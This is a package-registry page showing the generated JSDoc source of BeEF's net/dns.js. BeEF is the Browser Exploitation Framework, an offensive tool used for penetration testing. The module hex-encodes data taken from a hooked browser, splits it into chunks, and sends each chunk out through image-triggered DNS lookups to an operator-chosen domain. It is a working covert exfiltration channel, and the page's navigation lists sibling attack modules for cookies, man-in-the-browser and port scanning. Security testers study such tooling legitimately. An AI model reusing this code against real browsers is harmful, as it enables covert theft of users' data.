UNPKG

beef-npm

Version:

Node.js package to install and interact with BeEF (Browser Exploitation Framework)

149 lines (107 loc) 5.97 kB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>JSDoc: Source: net/dns.js</title> <script src="scripts/prettify/prettify.js"> </script> <script src="scripts/prettify/lang-css.js"> </script> <!--[if lt IE 9]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css"> <link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css"> </head> <body> <div id="main"> <h1 class="page-title">Source: net/dns.js</h1> <section> <article> <pre class="prettyprint source linenums"><code>// // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - https://beefproject.com // See the file 'doc/COPYING' for copying permission // /** * * request object structure: * + msgId: {Integer} Unique message ID for the request. * + domain: {String} Remote domain to retrieve the data. * + wait: {Integer} Wait time between requests (milliseconds) - NOT IMPLEMENTED * + callback: {Function} Callback function to receive the number of requests sent. * @namespace beef.net.dns */ beef.net.dns = { handler: "dns", /** * * @param msgId * @param data * @param domain * @param callback */ send: function(msgId, data, domain, callback) { var encode_data = function(str) { var result=""; for(i=0;i&lt;str.length;++i) { result+=str.charCodeAt(i).toString(16).toUpperCase(); } return result; }; var encodedData = encodeURI(encode_data(data)); beef.debug(encodedData); beef.debug("_encodedData_ length: " + encodedData.length); // limitations to DNS according to RFC 1035: // o Domain names must only consist of a-z, A-Z, 0-9, hyphen (-) and fullstop (.) characters // o Domain names are limited to 255 characters in length (including dots) // o The name space has a maximum depth of 127 levels (ie, maximum 127 subdomains) // o Subdomains are limited to 63 characters in length (including the trailing dot) // DNS request structure: // COMMAND_ID.SEQ_NUM.SEQ_TOT.DATA.DOMAIN //max_length: 3. 3 . 3 . 63 . x // only max_data_segment_length is currently used to split data into chunks. and only 1 chunk is used per request. // for optimal performance, use the following vars and use the whole available space (which needs changes server-side too) var reserved_seq_length = 3 + 3 + 3 + 3; // consider also 3 dots var max_domain_length = 255 - reserved_seq_length; //leave some space for sequence numbers var max_data_segment_length = 63; // by RFC beef.debug("max_data_segment_length: " + max_data_segment_length); var dom = document.createElement('b'); String.prototype.chunk = function(n) { if (typeof n=='undefined') n=100; return this.match(RegExp('.{1,'+n+'}','g')); }; var sendQuery = function(query) { var img = new Image; //img.src = "http://"+query; img.src = beef.net.httpproto + "://" + query; // prevents issues with mixed content img.onload = function() { dom.removeChild(this); } img.onerror = function() { dom.removeChild(this); } dom.appendChild(img); //experimental //setTimeout(function(){dom.removeChild(img)},1000); }; var segments = encodedData.chunk(max_data_segment_length); var ident = "0xb3"; //see extensions/dns/dns.rb, useful to explicitly mark the DNS request as a tunnel request beef.debug(segments.length); for (var seq=1; seq&lt;=segments.length; seq++) { sendQuery(ident + msgId + "." + seq + "." + segments.length + "." + segments[seq-1] + "." + domain); } // callback - returns the number of queries sent if (!!callback) callback(segments.length); } }; beef.regCmp('beef.net.dns'); </code></pre> </article> </section> </div> <nav> <h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="BeefJS.html">BeefJS</a></li><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li></ul><h3>Global</h3><ul><li><a href="global.html#platform">platform</a></li></ul> </nav> <br class="clear"> <footer> Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 4.0.4</a> on Wed Oct 23 2024 16:03:46 GMT+1000 (Australian Eastern Standard Time) </footer> <script> prettyPrint(); </script> <script src="scripts/linenumber.js"> </script> </body> </html>